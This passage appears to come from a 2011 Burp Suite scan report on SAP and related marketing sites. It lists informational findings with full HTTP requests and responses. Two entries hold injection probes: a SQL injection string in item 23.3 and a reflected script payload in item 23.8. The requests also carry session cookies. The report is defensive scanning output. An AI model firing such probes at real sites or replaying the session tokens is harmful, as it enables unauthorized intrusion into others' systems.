CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; a1slocale=en; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; PortalAlias=sme

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERENzctRDcwRDRENEJGQjk0QkM3MQ==
Cache-Control: max-age=86400
Vary: Accept-Encoding
Content-Length: 255
Date: Sat, 15 Oct 2011 14:33:55 GMT
Connection: keep-alive

<html>
<head>
   <title></title>
</head>
<script language="JavaScript">
var x = location.hostname.indexOf('.')+1;
if (x>0) document.domain = location.hostname.substring(x);
</sc
...[SNIP]...
22.15. https://www.sme.sap.com/irj/servlet/prt/portal/prtmode/rss/prtroot/feedserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/servlet/prt/portal/prtmode/rss/prtroot/feedserver

Request

GET /irj/servlet/prt/portal/prtmode/rss/prtroot/feedserver HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 15:05:22 GMT
Connection: close

22.16. https://www.sme.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon

Request

GET /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; a1slocale=en; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; PortalAlias=sme

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
Expires: 0
Content-Length: 992
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:33:55 GMT
Connection: keep-alive

<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/SDN/glbl/glbl_nn7.css?7.0.17.0.1">
<LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal
...[SNIP]...
22.17. https://www.sme.sap.com/irj/sme/logon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Request

GET /irj/sme/logon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33344
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:32:55 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
22.18. https://www.sme.sap.com/irj/sme/memberlogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Request

GET /irj/sme/memberlogin HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33346

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
23. HTML does not specify charset  previous  next
There are 15 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

23.1. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1672981;type=sapph221;cat=lobsp230;ord=2544070638250.5596? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1672981;type=sapph221;cat=lobsp230;ord=2544070638250.5596?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 15 Oct 2011 14:24:23 GMT
Expires: Sat, 15 Oct 2011 14:24:23 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>
23.2. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=892&ref2=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&tzo=360&ms=232 HTTP/1.1
Host: now.eloqua.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: ELOQUA=GUID=19DDB6AE1941431A910441006951B164; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sat, 15 Oct 2011 14:19:08 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
23.3. http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/t/2716635132'%20or%201%3d2--%20

Request

GET /pub/t/2716635132'%20or%201%3d2--%20 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D7%3B%20s_sq%3D%3B; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; mbox=session#1318688512533-813903#1318691832|check#true#1318690032; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2011 14:48:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 38
Connection: close
Content-Type: text/html

The server has encountered a problem.
23.4. http://www.sap.com/global/ui/fonts/bensbk-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /global/ui/fonts/bensbk-webfont.woff

Request

GET /global/ui/fonts/bensbk-webfont.woff HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/global/ui/css/sapcom.css
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=7200
Content-Type: text/html
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:13 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
23.5. http://www.sapandasug.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapandasug.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sapandasug.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1211052; CFTOKEN=25795824

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.
23.6. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Request

GET /css/fancy-popup-styles.css HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 739
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
23.7. http://www.sapbusinessoptimizer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692592.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 709
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
23.8. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:30:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 819
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
23.9. http://www.sapphirenow.com/madrid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid/

Request

GET /madrid/ HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/sapphirenowsaptechedmadrid/ChooseYourExperience..htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 13 Oct 2011 21:38:10 GMT
Accept-Ranges: bytes
ETag: "04dfe66f089cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:23:03 GMT
Content-Length: 32216

...<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta charset="utf-8">
<title>SAPPHIRE NOW ... Madrid</title>
<!--banner slider scrip
...[SNIP]...
23.10. http://www.sapphirenow.com/madrid/Overview.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid/Overview.html

Request

GET /madrid/Overview.html HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/madrid/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 11 Oct 2011 23:25:26 GMT
Accept-Ranges: bytes
ETag: "5059b6e6d88cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:24:52 GMT
Content-Length: 20898

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta charset="utf-8">
<title>SAPPHIRE NOW ... Madrid</title>

<!--banner slider script
...[SNIP]...
23.11. http://www.sapphirenow.com/madrid/player.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid/player.html

Request

GET /madrid/player.html HTTP/1.1
Host: www.sapphirenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html
Date: Sat, 15 Oct 2011 15:04:53 GMT
Accept-Ranges: bytes
ETag: "70f68ef6d88cc1:0"
Connection: close
Last-Modified: Tue, 11 Oct 2011 23:25:28 GMT
X-Powered-By: ASP.NET
Content-Length: 1692

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta charset="utf-8">
<title></title>

<script type="text/javascript" src="js/html5.js"></
...[SNIP]...
